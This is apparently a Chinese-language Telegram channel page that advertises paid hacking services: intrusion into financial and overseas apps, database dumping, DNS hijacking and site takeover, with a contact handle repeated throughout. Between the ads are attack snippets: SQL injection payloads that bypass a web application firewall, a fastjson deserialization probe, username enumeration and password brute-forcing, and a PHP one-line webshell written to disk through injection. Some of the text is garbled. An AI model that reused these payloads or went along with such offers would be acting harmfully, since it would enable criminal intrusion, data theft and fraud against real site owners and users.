黑客渗透 金融劫持 BC域名跳转
17.9K subscribers
1.79K photos
19 videos
2 files
161 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
通过不断对order by字符串内容进行增删改,以及 Unicode 编码等操作后,测试效果参考如下:

{"shareType":"4 orderby 1 -- "} - 不拦截,查询失败
{"shareType":"4 order/**/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*123*/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*"*/by 1 -- "} - 不拦截,查询成功
通过order by获取列数后,开始获取数据库类型及当前数据库。判断数据库类型可以通过不同的查询语法进行判断,当数据查询失败时,可以大致判定当前数据库不支持该语法。不同数据库部分判断依据可参考如下:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
fastjson反序列化
查看pom.xml文件发现fastjson版本1.2.55,该版本存在漏洞,利用DNSlog进行验证。
fastjson涉及反序列化的方法有两种,JSON.parseObject()和JSON.parse(),在代码中直接搜索parseObject。
1
对该方法进行回溯,随机选取一个判断传进去的参数是否可控。通过上面的SQL注入分析已经知道getUserList方法中的search是直接从前端传进来的,参数可控。直接构造Payload:{"@type":"java.net.Inet4Address","val":"2czklw.dnslog.cn"}

然后在进行URL编码。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1
当用户不存在时提示用户名不存在,可以以此来枚举用户的账号。
成功爆破出用户名。
1
暴力破解
找到登录接口的代码发现登录接口的代码没有做任何防暴力破解的安全措施,根据上面的账号枚举枚举出来的账号直接进行密码爆破,抓包发现密码经过MD5加密的。
1
利用burpsuite进行爆破。

成功爆破出密码。
👍2
SELECT tablename
FROM pg_tables
WHERE schemaname = 'public';
ELECT tablename, schemaname
FROM pg_tables
WHERE schemaname NOT IN ('information_schema', 'pg_catalog');
适用于多模式(schema)环境,过滤掉系统表。

通过information_schema.tables
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
编译项目

cd WebGoat

mvn clean install

运行项目

mvn -pl webgoat-server spring-boot:run

访问WebGoat

localhost:8080/WebGoat

import WebGoat到IDEA 进行代码查看及调试

选择Maven
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
通过扫描目录,还发现有phpmyadmin, 可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell
👍21
无论使用何种方法,该活动的最终目标都是利用恶意软件入侵目标主机,该恶意软件主要是一个能够执行远程命令、数据泄露和截屏的后门。该后门模块在 Windows 系统中使用 Python 实现,在 Linux 系统中使用 Go 实现。

或者,攻击链最终还会部署 W4SP Stealer 或剪辑器恶意软件,旨在密切关注受害者的剪贴板活动,并将原始钱包地址(如果存在)与攻击者控制的地址交换。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
3
可以看到输入payload后,,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过
发现这个注入点后,就有各种各样的注入方式了,通过sq语句口写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看着那种方法可以。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1
subDomainsbrute工具可以用于二级域名收集,下载地址:https://github.com/lijiejie/subDomainsBrute

Python3环境下运行需要安装aiodns库。使用该工具的命令执行如下:

python3 subDomainsBrute.py xxxx.com
2
通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点把梭,发现并没有,使用脚本也没有绕过

通过burp抓包,写入一句话,payload:admin%27ununionionselselectect12,3,4<?php@eval(POST123):?intooutfilexm.php#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍21